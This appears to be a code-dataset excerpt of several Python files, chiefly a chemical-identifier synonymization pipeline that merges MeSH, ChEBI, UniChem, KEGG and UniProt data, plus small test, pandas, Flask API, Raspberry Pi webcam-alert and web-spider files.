'author',\n })\n\n work = db.table('work').where('id', work_id).first()\n\n self.assertIsNone(work.get('deletedAt'))\n\n body = json.loads(handler({\n 'pathParameters': {'id': work_id},\n }, None)['body'])\n\n work = db.table('work').where('id', work_id).first()\n\n self.assertEqual(body['error']['code'], 2)\n self.assertEqual(body['error']['message'], 'no permissions')\n self.assertIsNone(work.get('deletedAt'))\n","sub_path":"works/delete_spec.py","file_name":"delete_spec.py","file_ext":"py","file_size_in_byte":1773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"300412326","text":"from functools import partial\nimport logging\nimport os\nimport pickle\nimport requests\nimport asyncio\nimport gzip\nfrom collections import defaultdict\n\nfrom babel.unichem.unichem import load_unichem\nfrom src.util import LoggingUtil, Text\nfrom src.LabeledID import LabeledID\n\nfrom babel.chemical_mesh_unii import refresh_mesh_pubchem\nfrom babel.babel_utils import glom, pull_via_ftp, write_compendium, make_local_name\nfrom babel.chemistry_pulls import pull_chebi, pull_uniprot, pull_iuphar, pull_kegg_sequences, pull_kegg_compounds\nfrom babel.ubergraph import UberGraph\n\nlogger = LoggingUtil.init_logging(\"chemicals\", logging.ERROR, format='medium', logFilePath=f'{os.path.dirname(os.path.abspath(__file__))}/logs/')\n\ndef make_mesh_id(mesh_uri):\n return f\"mesh:{mesh_uri.split('/')[-1][:-1]}\"\n\ndef pull_mesh_chebi():\n url = 'https://query.wikidata.org/sparql?format=json&query=SELECT ?chebi ?mesh WHERE { ?compound wdt:P683 ?chebi . ?compound wdt:P486 ?mesh. }'\n results = requests.get(url).json()\n pairs = [(f'MESH:{r[\"mesh\"][\"value\"]}', f'CHEBI:{r[\"chebi\"][\"value\"]}')\n for r in results['results']['bindings']\n if not r['mesh']['value'].startswith('M')]\n #Wikidata is great, except when it sucks. One thing it likes to do is to\n # have multiple CHEBIs for a concept, say ignoring stereochemistry or \n # the like. No good. It's easy enough to filter these out, but then \n # we wouldn't have the mesh associated with anything. A spot check makes it seem like\n # cases of this type usually also have a UNII. So we can perhaps remove ugly pairs without\n # a problem.\n m2c = defaultdict(list)\n for m,c in pairs:\n m2c[m].append(c)\n fpairs = []\n for m,clist in m2c.items():\n if len(clist) == 1:\n fpairs.append( (m,clist[0]) )\n mcname = make_local_name('mesh_chebi.txt')\n with open(mcname, 'w') as outf:\n for m, c in fpairs:\n outf.write(f'{m}\\t{c}\\n')\n return fpairs\n\ndef pull_uniprot_chebi():\n url = 'https://query.wikidata.org/sparql?format=json&query=SELECT DISTINCT ?c ?s WHERE { ?compound wdt:P683 ?c. ?compound p:P352 ?statement . ?statement pq:P2888 ?s. }'\n results = requests.get(url).json()\n pairs = [ (f'UniProtKB:{r[\"s\"][\"value\"].split(\"/\")[-1]}',f'CHEBI:{r[\"c\"][\"value\"]}')\n for r in results['results']['bindings'] ]\n #with open('uniprot_chebi.txt','w') as outf:\n # for m,c in pairs:\n # outf.write(f'{m}\\t{c}\\n')\n return pairs\n\ndef filter_mesh_chebi(mesh_chebi,concord):\n \"\"\"MESH/CHEBI is a real mess though. wikidata has no principled way to connect identifiers. It's just whatever\n somebody said. We really should use as a last resort. If we don't know much about it, then sure. But if\n we've already got a chebi or a unii, then we should ignore this wiki stuff.\"\"\"\n fmc = []\n for m,c in mesh_chebi:\n if m not in concord:\n fmc.append( (m,c) )\n else:\n equivs = concord[m]\n prefs = [ Text.get_curie(e) for e in equivs ]\n if ('CHEBI') in prefs:\n continue\n if ('UNII') in prefs:\n continue\n if ('INCHIKEY') in prefs:\n continue\n fmc.append( (m,c) )\n return fmc\n\n##\n# Here's a pointless rant about chemical synonymization.\n#\n# IT SHOULD BE EASY\n#\n# Chemicals are defined structures! Inchikeys! SMILES! It isn't rocket science!\n# If it has the same strucrture, it's the same! If it doesn't, it isn't!\n# \n# Here's the problem - some vocabularies use chemicals, but not based on\n# structures. These are usually bullshit vocabularies like MeSH (It's, like,\n# just a concept, dude) that occasionally just assert that they're the same\n# as something that does have a structure, like a UNII. On the whole if \n# one of these ding-dong vocabularies gives us that information, we should\n# use it because it's the only objective statement about the identity of the\n# term that will ever exist.\n#\n# Anybody who asserts that things with different structures are the same should\n# be brought up on charges at the Hague. I'm looking at you, wikidata, and your\n# willingness to identify e.g. hydrous and anhydrous CHEBIs in the same entry\n#\n# Also, it would be great if UNII could figure out how to assign inchis\n# correctly. Both Stibine (antimony with hydrogen atoms) and Antimony \n# (elemental) end up wth the same inchikey erroneously, which causes all\n# sorts of downstream problems, because other stuff links to them separately\n# and sort of correctly if you don't pay attention to the keys and just to the \n# name, which apparently is what people do even in our advanced civilization.\n# And we can't ignore UNII completely because that's one of the links that MeSH uses.\n#\n##\n\n###\n#\n# Chemical synonymization includes both small molecules and large molecules (peptides and proteins)\n# In many cases these don't intersect, but in some they do, and we need to handle that\n#\n# Chemicals can be described 4 ways:\n# 1. InchiKey - the most specific. For chemicals with ik's, UniChem has a concordance.\n# 2. SMILES - everything with an IK has a smiles, but not vice versa: can handle things like R-groups\n# 3. AA sequence - Peptides e.g. can be described with a smiles, but AA sequence is more succinct. Sometimes\n# this can get ugly, because something might be made up of 2 sequences hooked together.\n# 4. Nothing - We can have a name for something without any information about the structure.\n#\n# Each source can contain a mix. So e.g. chebi contains some with inchi, some with smiles, and some with nothing\n#\n# Synonymization process:\n# 1. Handle all the stuff that has an InchiKey using unichem\n# 2. Mesh is all \"no structure\". We try to use a variety of sources to hook mesh id's to anything else\n# 3. Pull from chebi the sdf and db files, use them to link to things (KEGG) in the no inchi/no smiles cases\n# 4. Go to KEGG, and get sequences for peptides.\n# 5. Pull UniProt (swissprot) XML. Calculate sequences for the sub-sequences (Uniprot_PRO)\n# 6. Use the sequences to merge UniProt_PRO with KEGG.\n# 7. Read IUPHAR, discard things with INCHI, use things with sequence to match UniProt_PRO/KEGG\n# Use the hand-curated version of IUPHAR to match the un-sequenced stuff left over\n# 8. Use wikidata to get links between CHEBI and UniProt_PRO\n# 9. glom across sequence and chemical stuff\n# 10. Drop PRO only sequences.\n#\n# It would be good to completely redo this so that it was make-like.\ndef load_chemicals(refresh_mesh=False,refresh_uniprot=False,refresh_pubchem=False,refresh_chembl=False):\n #Keep labels separate\n labels = {}\n # DO MESH/CHEBI, but don't combine any chebi's into a set with it\n print('MESH/CHEBI')\n mesh_chebi = pull_mesh_chebi()\n # Build if need be\n if refresh_mesh:\n refresh_mesh_pubchem()\n #Get all the simple stuff\n # 1. Handle all the stuff that has an InchiKey using unichem\n # 2. Mesh is all \"no structure\". We try to use a variety of sources to hook mesh id's to anything else\n print('UNICHEM')\n #refresh\n concord = load_unichem(refresh=True)\n #don't refresh\n #concord = load_unichem()\n # 2. Mesh is all \"no structure\". We try to use a variety of sources to hook mesh id's to anything else\n #DO MESH/UNII\n print('MESH/UNII')\n mesh_unii_file = make_local_name( 'mesh_to_unii.txt')\n mesh_unii_pairs = load_pairs(mesh_unii_file, 'UNII')\n glom(concord, mesh_unii_pairs,pref='MESH')\n print('write-mesh-unii was fine')\n check_multiple_ids(concord)\n # DO MESH/PUBCHEM\n print('MESH/PUBCHEM')\n mesh_pc_file = make_local_name('mesh_to_pubchem.txt')\n mesh_pc_pairs = load_pairs(mesh_pc_file, 'PUBCHEM.COMPOUND')\n glom(concord, mesh_pc_pairs,pref='MESH')\n print('write-mesh-pubchem')\n check_multiple_ids(concord)\n # DO MESH/CHEBI, but don't combine any chebi's into a set with it\n #print('MESH/CHEBI')\n #mesh_chebi = pull_mesh_chebi()\n #Merging CHEBIS can be ok because of primary/secondary chebis. Really we \n # don't want to merge INCHIs\n #MESH/CHEBI is a real mess though. wikidata has no principled way to connect identifiers. It's just whatever\n # somebody said. We really should use as a last resort. If we don't know much about it, then sure. But if\n # we've already got a chebi or a unii, then we should ignore this wiki stuff.\n mesh_chebi_filter = filter_mesh_chebi(mesh_chebi,concord)\n print(f\"Started with {len(mesh_chebi)} m/c pairs\")\n print(f\"filtered to {len(mesh_chebi_filter)} m/c pairs\")\n glom(concord, mesh_chebi_filter,pref='MESH')\n print('write-mesh-chebi')\n check_multiple_ids(concord)\n #Now pull all the chemical meshes.\n cmesh = []\n with open( make_local_name('chemical_mesh.txt'),'r') as inf:\n for line in inf:\n s = line.strip().split('\\t')\n meshid = f'MESH:{s[0]}'\n label = s[1]\n cmesh.append ( (meshid,) )\n labels[meshid] = label\n glom(concord, cmesh)\n #print('write-mesh')\n #this one is ok 3/8/2020\n #write_compendium(set([ frozenset(x) for x in concord.values() ]),'chemconc_mesh.txt','chemical_substance',labels=labels)\n check_multiple_ids(concord)\n # 3. Pull from chebi the sdf and db files, use them to link to things (KEGG) in the no inchi/no smiles cases\n print('chebi')\n pubchem_chebi_pairs, kegg_chebi_pairs, chebi_unmapped = pull_chebi()\n all_chebis,chebi_labels = get_all_chebis()\n labels.update(chebi_labels)\n glom(concord, pubchem_chebi_pairs,pref= 'CHEBI')\n glom(concord, kegg_chebi_pairs,pref='CHEBI')\n glom(concord, chebi_unmapped, pref='CHEBI')\n glom(concord, all_chebis, pref = 'CHEBI')\n print('write-chebi')\n #good march 8#\n #write_compendium(set([ frozenset(x) for x in concord.values() ]),'chemconc_chebi.txt','chemical_substance',labels=labels)\n #exit()\n check_multiple_ids(concord)\n # 3a. pull in all KEGG labels and compounds. This is mostly to pick up keggs that don't map to anything else\n print('kegg')\n kname = make_local_name('kegg.pickle')\n #to refresh kegg:\n keggs,kegg_labels = pull_kegg_compounds()\n with open(kname,'wb') as kf:\n pickle.dump((keggs,kegg_labels),kf)\n # To use old KEGG\n #with open(kname,'rb') as inf:\n # keggs,kegg_labels = pickle.load(inf)\n fkeggs = [ (k,) for k in keggs ]\n keggs = fkeggs\n glom(concord,keggs,pref='KEGG')\n labels.update(kegg_labels)\n #OK TO HERE\n check_multiple_ids(concord)\n #write_compendium(set([ frozenset(x) for x in concord.values() ]),'chemconc_kegg.txt','chemical_substance',labels=labels)\n # 4. Go to KEGG, and get sequences for peptides.\n sequence_concord = pull_kegg_sequences()\n # 5. Pull UniProt (swissprot) XML.\n # Calculate sequences for the sub-sequences (Uniprot_PRO)\n print('uniprot')\n sequence_to_uniprot = pull_uniprot(refresh_uniprot)\n # 6. Use the sequences to merge UniProt with KEGG\n for s,v in sequence_to_uniprot.items():\n sequence_concord[s].update(v)\n # 7. Read IUPHAR, discard things with INCHI, use things with sequence to match UniProt_PRO/KEGG\n # Use the hand-curated version of IUPHAR to match the un-sequenced stuff left over\n print('iuphar')\n sequence_to_iuphar, iuphar_glom = pull_iuphar()\n for s,v in sequence_to_iuphar.items():\n sequence_concord[s].update(v)\n glom(concord,iuphar_glom,pref='gtpo')\n #write_compendium(set([ frozenset(x) for x in concord.values() ]),'chemconc_iuphar.txt','chemical_substance',labels=labels)\n check_multiple_ids(concord)\n # 8. Use wikidata to get links between CHEBI and UniProt_PRO\n #These 2 lines are if we want back uniprots\n #unichebi = pull_uniprot_chebi() \n #glom(concord, unichebi)\n #write_compendium(set([ frozenset(x) for x in concord.values() ]),'chemconc_unicheb.txt','chemical_substance',labels=labels)\n check_multiple_ids(concord)\n # 9. glom across sequence and chemical stuff\n new_groups = sequence_concord.values()\n glom(concord,new_groups,unique_prefixes=['gtpo','INCHI'])\n #write_compendium(set([ frozenset(x) for x in concord.values() ]),'chemconc_newgroups.txt','chemical_substance',labels=labels)\n check_multiple_ids(concord)\n # 10. Drop PRO only sequences.\n # Something odd going on, remove for now.\n #for eq_id_set in concord:\n # if len(eq_id_set) > 1:\n # continue\n # print(eq_id_set)\n # item = iter(eq_id_set).next()\n # if '#PRO_' in item:\n # to_remove.add(eq_id_set)\n #for eids in to_remove:\n # concord.remove(eids)\n #And we're back\n #Add labels to CHEBIs, CHEMBLs, MESHes\n print('LABEL')\n #label_chebis(concord)\n labels.update(label_chembls(concord, refresh_chembl = refresh_chembl ))\n #label_meshes(concord)\n# label_pubchem(concord, refresh_pubchem = refresh_pubchem)\n print('dumping')\n #Dump\n #tout = set([frozenset(x) for x in concord.values()][:10000])\n #write_compendium(tout,'chemconc.txt','chemical_substance',labels=labels)\n #exit()\n write_compendium(set([ frozenset(x) for x in concord.values() ]),'chemconc.txt','chemical_substance',labels=labels)\n print('done')\n\ndef check_multiple_ids(g):\n used = set()\n olks = {}\n for k in g.keys():\n if isinstance(k,LabeledID):\n kid = k.identifier \n else:\n kid = k\n if kid in used:\n print('ugh')\n print(kid,k)\n print(g[k])\n print(g[olks[kid]])\n exit()\n olks[kid] = k\n used.add(kid)\n\ndef get_chebi_label(ident):\n res = requests.get(f'https://uberonto.renci.org/label/{ident}/').json()\n return res['label']\n\ndef get_chembl_label(ident):\n res = requests.get(f'https://www.ebi.ac.uk/chembl/api/data/molecule/{Text.un_curie(ident)}.json').json()\n return res['pref_name']\n\ndef get_dict_label(ident, labels):\n try:\n return labels[ident]\n except KeyError:\n return None\n\ndef get_mesh_label(ident, labels):\n try:\n return labels[Text.un_curie(ident)]\n except KeyError:\n return \"\"\n\n###\n\ndef get_all_chebis():\n print('READ CHEBI')\n iri = 'CHEBI:24431'\n uber = UberGraph()\n chebis = []\n chebi_labels = {}\n uberres = uber.get_subclasses_of(iri)\n for c in uberres:\n chebis.append( (c['descendent'],) )\n chebi_labels[ c['descendent'] ] = c['descendentLabel']\n return chebis, chebi_labels\n\n\ndef get_all_chebis_obo():\n print('READ CHEBI')\n chebiobo = pull_via_ftp('ftp.ebi.ac.uk', '/pub/databases/chebi/ontology', 'chebi_lite.obo')\n lines = chebiobo.split('\\n')\n chebis = []\n chebi_labels = {}\n for line in lines:\n if line.startswith('[Term]'):\n tid = None\n label = None\n elif line.startswith('id:'):\n tid = line[3:].strip()\n elif line.startswith('name:'):\n label = line[5:].strip()\n #There's some stuff in here like \"has_part, has part\"\n if tid.startswith('CHEBI:'):\n #lid = LabeledID(identifier=tid, label=label)\n chebis.append( (tid, ) )\n chebi_labels[tid] = label\n return chebis, chebi_labels\n #print('LABEL CHEBI')\n #label_compounds(concord, 'CHEBI', partial(get_dict_label, labels=chebi_labels))\n # label_compounds(concord,'CHEBI',get_chebi_label)\n\n\ndef process_chunk(lines, label_dict):\n if len(lines) == 0:\n return\n if not lines[0].startswith('chembl_molecule'):\n return\n chemblid = f\"CHEMBL.COMPOUND:{lines[0].split()[0].split(':')[1]}\"\n label = None\n for line in lines[1:]:\n s = line.strip()\n if s.startswith('rdfs:label'):\n label = s.split()[1]\n if label.startswith('\"'):\n label = label[1:]\n if label.endswith('\"'):\n label = label[:-1]\n if label is not None:\n label_dict[chemblid] = label\n\n\ndef label_chembls(concord, refresh_chembl = False):\n print('READ CHEMBL')\n fname = 'chembl_25.0_molecule.ttl.gz'\n localfile = make_local_name(fname[:-3])\n # uncomment if you need a new one\n if refresh_chembl:\n data=pull_via_ftp('ftp.ebi.ac.uk', '/pub/databases/chembl/ChEMBL-RDF/25.0/',fname,decompress_data=True,outfilename=fname[:-3])\n chembl_labels = {}\n chunk = []\n with open(localfile, 'r') as inf:\n for line in inf:\n l = line.strip()\n if len(l) == 0:\n process_chunk(chunk, chembl_labels)\n chunk = []\n elif l.startswith('@'):\n pass\n else:\n chunk.append(l)\n return chembl_labels\n #print('LABEL CHEMBL', len(chembl_labels))\n #label_compounds(concord, 'CHEMBL.COMPOUND', partial(get_dict_label, labels=chembl_labels))\n # label_compounds(concord,'CHEMBL',get_chembl_label)\n\n\ndef label_meshes(concord):\n print('LABEL MESH')\n #labelname = os.path.join(os.path.dirname(__file__), 'meshlabels.pickle')\n labelname = make_local_name('meshlabels.pickle')\n with open(labelname, 'rb') as inf:\n mesh_labels = pickle.load(inf)\n label_compounds(concord, 'MESH', partial(get_mesh_label, labels=mesh_labels))\n\ndef label_pubchem(concord, refresh_pubchem = False):\n print('LABEL PUBCHEM')\n f_name = 'CID-IUPAC.gz'\n if refresh_pubchem:\n outfname = pull_via_ftp('ftp.ncbi.nlm.nih.gov','/pubchem/Compound/Extras/', f_name, outfilename=f_name)\n else:\n outfname = make_local_name(f_name)\n labels = {}\n with gzip.open(outfname, 'rt') as in_file:\n for line in in_file:\n # since the synonyms are weighted already will just pick the first one.\n l = line.strip()\n cid, label = l.split('\\t')\n if f'PUBCHEM.COMPOUND:{cid}' in labels:\n continue\n labels[f'PUBCHEM.COMPOUND:{cid}'] = label\n label_compounds(concord, 'PUBCHEM.COMPOUND', partial(get_dict_label, labels= labels))\n\n\n###\n\ndef label_compounds(concord, prefix, get_label):\n foundlabels = {}\n for k, v in concord.items():\n to_remove = []\n to_add = []\n for ident in v:\n if Text.get_curie(ident) == prefix:\n if not ident in foundlabels:\n label = get_label(ident)\n if label is not None:\n #lid = LabeledID(ident, get_label(ident))\n foundlabels[ident] = label\n #else:\n # foundlabels[ident] = None\n if ident in foundlabels:\n label = foundlabels[ident]\n if label is not None:\n to_remove.append(ident)\n to_add.append(foundlabels[ident])\n for r in to_remove:\n v.remove(r)\n for r in to_add:\n v.add(r)\n\n\ndef remove_ticks(s):\n if s.startswith(\"'\"):\n s = s[1:]\n if s.endswith(\"'\"):\n s = s[:-1]\n return s\n\n\ndef load_pairs(fname, prefix):\n pairs = []\n with open(fname, 'r') as inf:\n for line in inf:\n x = line.strip().split('\\t')\n mesh = f\"MESH:{x[0]}\"\n if x[1].startswith('['):\n pre_ids = x[1][1:-1].split(',')\n pre_ids = [remove_ticks(pids.strip()) for pids in pre_ids] # remove spaces and ' marks around ids\n else:\n pre_ids = [x[1]]\n ids = [f'{prefix}:{pid}' for pid in pre_ids]\n for identifier in ids:\n pairs.append((mesh, identifier))\n return pairs\n\n\ndef uni_glom(unichem_data, prefix1, prefix2, chemdict):\n print(f'{prefix1}/{prefix2}')\n n = unichem_data.split('\\n')[1:]\n if len(n[-1]) == 0:\n n = n[:-1]\n pairs = [ni.split('\\t') for ni in n]\n for p in pairs:\n if p[0].startswith(\"'\") or p[1].startswith(\"'\"):\n print('UNI_GLOM {prefix1} {prefix2} {p}')\n curiepairs = [(f'{prefix1}:{p[0]}', f'{prefix2}:{p[1]}') for p in pairs]\n glom(chemdict, curiepairs)\n\n\n\n\n#########################\n# load_unichem() - Loads a dict object with targeted chemical substance curies for synonymization\n#\n# TODO: get the column header from the readme. Unfortunately means that we need the readme not to change...\n#\n# The XREF file format from unichem\n# ftp.ebi.ac.uk/pub/databases/chembl/UniChem/data/oracleDumps/UDRI/UC_XREF.txt.gz\n# September 2019:\n# cols: uci src_id src_compound_id assignment last_release_u_when_current created lastupdated userstamp aux_src\n# December 2019:\n# cols: uci_old , src_id , src_compound_id , assignment , last_release_u_when_current , created , lastupdated , userstamp , aux_src , uci\n#\n# The STRUCTURE file format from unichem\n# ftp.ebi.ac.uk/pub/databases/chembl/UniChem/data/oracleDumps/UDRI/UC_STRUCTURE.txt.gz\n# September 2019:\n# cols: uci standardinchi standardinchikey created username fikhb\n# December 2019:\n# cols: uci_old , standardinchi , standardinchikey , created , username , fikhb , uci , parent_smiles\n#\n# working_dir: str - the working directory for the downloaded files\n# xref_file: str - optional location of already downloaded and decompressed unichem XREF file\n# struct_file: str - optional location of already downloaded and decompressed unichem STRUCTURE file\n# return: dict - The cross referenced curies ready for inserting into the the redis cache\n#########################\n\n#########################\n# get_latest_unichem_url() - gets the latest UniChem data directory url\n#\n# return: str - the unichem FTP URL\n#########################\n\nasync def make_uberon_role_queries(chebi_ids, chemical_annotator):\n tasks = []\n for id in chebi_ids:\n tasks.append(chemical_annotator.get_chemical_roles(id))\n results = await asyncio.gather(*tasks)\n\n reformatted_result = {}\n for result in results:\n for chebi_id in result:\n reformatted_result[chebi_id] = list(map(lambda x: x['role_label'], result[chebi_id]))\n return reformatted_result\n\n\ndef merge_roles_and_annotations(chebi_role_data, chebi_annotation_data):\n \"\"\"\n Merges roles into the bigger annotation dict as roles key.\n \"\"\"\n for chebi_id in chebi_role_data:\n for key in chebi_role_data[chebi_id]:\n chebi_annotation_data[chebi_id][key] = True\n yield (chebi_id, chebi_annotation_data[chebi_id])\n\n\n#def annotate_from_chebi(rosetta):\n# chebisdf = pull_and_decompress('ftp.ebi.ac.uk', '/pub/databases/chebi/SDF/', 'ChEBI_complete_3star.sdf.gz')\n# chunk = []\n# logger.debug('caching chebi annotations')\n# # grab a bunch of them to make use of concurrent execution for fetching roles from Uberon\n# result_buffer = {}\n# num_request_per_round = 500\n# loop = asyncio.new_event_loop()\n# chemical_annotator = ChemicalAnnotator(rosetta)\n# interesting_keys = chemical_annotator.config['CHEBI']['keys']\n# lines = chebisdf.split('\\n')\n# count = 0\n# for line in lines:\n# if '$$$$' in line:\n# chebi_set = chebi_sdf_entry_to_dict(chunk, interesting_keys=interesting_keys)\n# chunk = []\n# result_buffer[chebi_set[0]] = chebi_set[1]\n# if len(result_buffer) == num_request_per_round:\n# chebi_role_data = loop.run_until_complete(make_uberon_role_queries(result_buffer.keys(), chemical_annotator))\n# for entry in merge_roles_and_annotations(chebi_role_data, result_buffer):\n# # entry[0] is the chebi id\n# rosetta.cache.set(f'annotation({Text.upper_curie(entry[0])})', entry[1])\n# # clear buffer\n# count += 1\n# result_buffer = {}\n# logger.debug(f'cached {count} entries... ')\n# else:\n# if line != '\\n':\n# line = line.strip('\\n')\n# chunk += [line]\n#\n# if len(result_buffer) != 0 :\n# #deal with the last pieces left in the buffer\n# chebi_role_data = loop.run_until_complete(make_uberon_role_queries(result_buffer.keys(),chemical_annotator))\n# for entry in merge_roles_and_annotations(chebi_role_data, result_buffer):\n# rosetta.cache.set(f'annotation({Text.upper_curie(entry[0])})', entry[1])\n# logger.debug('done caching chebi annotations...')\n# loop.close()\n\ndef chebi_sdf_entry_to_dict(sdf_chunk, interesting_keys={}):\n \"\"\"\n Converts each SDF entry to a dictionary\n \"\"\"\n final_dict = {}\n current_key = 'mol_file'\n chebi_id = ''\n for line in sdf_chunk:\n if len(line):\n if '>' == line[0]:\n current_key = line.replace('>', '').replace('<', '').strip().replace(' ', '').lower()\n current_key = 'formula' if current_key == 'formulae' else current_key\n if current_key in interesting_keys:\n final_dict[interesting_keys[current_key]] = ''\n continue\n if current_key == 'chebiid':\n chebi_id = line\n if current_key in interesting_keys:\n final_dict[interesting_keys[current_key]] += line\n return (chebi_id, final_dict)\n\n\n#async def make_multiple_chembl_requests(num_requests=100, start=0):\n# \"\"\"\n# Fetches 1000 records per request beginning from 'start' till 'num_requests' * 1000\n# \"\"\"\n# tasks = []\n# for i in range(0, num_requests):\n# offset = i * 1000 + start # chebml api returns 1000 records max\n# url = f\"https://www.ebi.ac.uk/chembl/api/data/molecule?format=json&limit=0&offset={offset}\"\n# tasks.append(async_client.async_get_json(url, {}))\n# results = await asyncio.gather(*tasks)\n# return results\n#\n#\n#def annotate_from_chembl(rosetta):\n# \"\"\"\n# Gets and caches chembl annotations.\n# \"\"\"\n# j = 100 # assume first that we can finish the whole thing with 100 rounds of 100 request for each round\n# all_results = []\n# logger.debug('annotating chembl data')\n# annotator = ChemicalAnnotator(rosetta)\n# for i in range(0, j):\n# # open the loop\n# loop = asyncio.new_event_loop()\n# num_requests = 100\n# start = (num_requests * 1000) * i\n# results = loop.run_until_complete(make_multiple_chembl_requests(num_requests=num_requests, start=start))\n# loop.close()\n# if i == 0:\n# # determine the actual number of records to not just guess when we should stop\n# total_count = results[0]['page_meta']['total_count']\n# j = round(total_count / (1000 * num_requests))\n# for result in results:\n# extract_chebml_data_add_to_cache(result, annotator, rosetta)\n# logger.debug(f'done annotating {(i / j) * 100} % of chembl')\n#\n# logger.debug('caching chebml stuff done...')\n\n\ndef extract_chebml_data_add_to_cache(result, annotator, rosetta):\n \"\"\"\n Helper function to parse out and extract useful info form a single request result from chebml api.\n \"\"\"\n molecules = result['molecules']\n for molecule in molecules:\n extract = annotator.extract_chembl_data(molecule, annotator.get_prefix_config('CHEMBL.COMPOUND')['keys'])\n #logger.debug(extract)\n chembl_id = molecule['molecule_chembl_id']\n rosetta.cache.set(f\"annotation({Text.upper_curie(chembl_id)})\", extract)\n\n\n#def load_annotations_chemicals(rosetta):\n# annotate_from_chebi(rosetta)\n# annotate_from_chembl(rosetta)\n\ndef kegg_stand():\n print('kegg')\n kname = make_local_name('kegg.pickle')\n #to refresh kegg:\n keggs,kegg_labels = pull_kegg_compounds()\n with open(kname,'wb') as kf:\n pickle.dump((keggs,kegg_labels),kf)\n\n\n#######\n# Main - Stand alone entry point for testing\n#######\nif __name__ == '__main__':\n #load_chemicals(refresh_mesh=False,refresh_uniprot=True,refresh_pubchem=True,refresh_chembl=True)\n load_chemicals(refresh_mesh=False,refresh_uniprot=False,refresh_pubchem=False,refresh_chembl=False)\n #load_unichem(working_dir='.',xref_file='UC_XREF.txt.gz',struct_file='UC_STRUCTURE.txt')\n","sub_path":"babel/chemicals.py","file_name":"chemicals.py","file_ext":"py","file_size_in_byte":28125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"77417818","text":"\"\"\"A collection of different types of moving averages.\"\"\"\nimport pandas as pd\n\n\ndef simple_moving_average(data_frame, data_column, window):\n \"\"\"Take the Simple Moving Average of the pandas dataframe.\"\"\"\n # Checking data_frame\n if not isinstance(data_frame, pd.DataFrame):\n raise TypeError(\"The data_frame has to be a pandas.DataFrame.\")\n\n # Checking column\n if not isinstance(data_column, (str)):\n raise TypeError(\"The data_column must be a string.\")\n elif data_column not in data_frame.columns:\n raise ValueError(\"The data_column does not exist in the data frame.\")\n\n # Checking window\n if isinstance(window, (bool)) or not isinstance(window, (int)):\n raise TypeError(\"The window must be an integer greater than zero.\")\n elif window < 1 or window > len(data_frame):\n raise ValueError('The window={} has to be between 1 and len(df).'\n .format(window))\n\n if data_frame.index.is_monotonic_increasing:\n simple_rolling = data_frame[data_column].rolling(window=window).mean()\n else:\n simple_rolling = data_frame[data_column].rolling(\n window=window).mean().shift(-(window-1))\n\n data_frame['SMA_{}'.format(window)] = simple_rolling\n\n return data_frame\n\n\ndef exponential_moving_average():\n \"\"\"Take the Exponential Moving Average of the pandas dataframe.\"\"\"\n raise NotImplementedError\n\n\nif __name__ == '__main__':\n pass\n","sub_path":"moving_average.py","file_name":"moving_average.py","file_ext":"py","file_size_in_byte":1444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"583100299","text":"from flask_restplus import Namespace, Resource, fields, marshal\n\napi = Namespace('Module', description='Module API Description')\n\nitems = [\n {'id': 1, 'message': 'success', 'data': 'this'},\n {'id': 2, 'message': 'failure', 'data': 'that'},\n {'id': 3, 'message': 'partial', 'data': 'the other'},\n]\n\nModel = api.model('Model', {\n 'id': fields.Integer(readonly=True, default=lambda: max([d['id'] for d in items]) + 1),\n 'message': fields.String(required=True, enum=['success', 'failure', 'partial']),\n 'data': fields.String(required=True, example='whatever')\n})\n\n\n@api.route('/')\nclass Endpoint(Resource):\n @api.marshal_with(Model, as_list=True)\n def get(self):\n \"\"\"Retrieve data\n\n Describe interesting details about endpoints here.\n\n You can also use [Markdown](https://github.com/adam-p/markdown-here/wiki/Markdown-Cheatsheet)\"\"\"\n\n return items\n\n @api.expect(Model, validate=True)\n @api.marshal_with(Model, as_list=False)\n def post(self):\n \"\"\"Submit data\"\"\"\n\n data = marshal(api.payload, Model)\n items.append(data)\n return data\n","sub_path":"resources/module.py","file_name":"module.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"449730402","text":"#!/usr/bin/env python\n\nimport time\nimport sys\nimport os\nimport datetime\nimport RPi.GPIO as gpio\n\n# Set the mode to BCM (mode = BOARD is not working!!)\ngpio.setmode(gpio.BCM)\n\n#Setup the temperature channel as input\ngpio.setup(4, gpio.IN)\n\n#Setup the proximity sensor channel as input\ngpio.setup(27, gpio.IN)\n\n#Add proximity event on rising edge\ngpio.add_event_detect(27, gpio.RISING)\n\ntry:\n while True:\n gpio.wait_for_edge(27, gpio.RISING)\n ts = time.time()\n print(\"Received proximity warning at \" + datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S'))\n os.system(\"fswebcam -r 960x720 /home/pi/webcam/proximity_warning.jpg\")\n execfile(\"TweetPic.py\") \nexcept KeyboardInterrupt:\n print(\"Received keyboard interrupt, stopping proximity sensing...\") \n\n\n\n#Print Raspberry Pi informationa nd GPIO module information\n#print(gpio.RPI_INFO, gpio.VERSION)\n#DEBUG\n#print(gpio.getmode(), gpio.gpio_function(4), gpio.gpio_function(27))\n\n#try:\n# while True:\n# if gpio.event_detected(27):\n# print(\"Received proximity warning!\")\n# fswebcam -r 960x720 /home/pi/webcam/proximity_warning.jpg\n# execfile(\"TweetPic.py\") \n#except KeyboardInterrupt:\n# print(\"Received keyboard interrupt, stopping proximity sensing...\") \n\n","sub_path":"HomeSecurity/secure.py","file_name":"secure.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"579368780","text":"# coding: utf-8\nfrom spider import html_downloader\nfrom spider import url_manager\nfrom spider import html_parser\nfrom spider import findPlacesNameEntity1\nfrom spider import findPlacesNameEntity2\nclass Spider():\n\n def __init__(self):\n self.downloader = html_downloader.HtmlDownloader()\n self.url_manager = url_manager.UrlManager()\n self.html_parser = html_parser.HtmlParser()\n\n def craw(self, root_url):\n count = 1\n result = []\n self.url_manager.add_new_url(root_url)\n segmentor, postagger, recognizer = findPlacesNameEntity1.getLtpSegmentorPostaggerRecognizer()\n f = open('text.txt', 'w+', encoding='utf-8')\n while self.url_manager.has_new_url():\n try:\n new_url = self.url_manager.get_new_url()\n html_content = self.downloader.download(new_url)\n new_urls, new_datas = 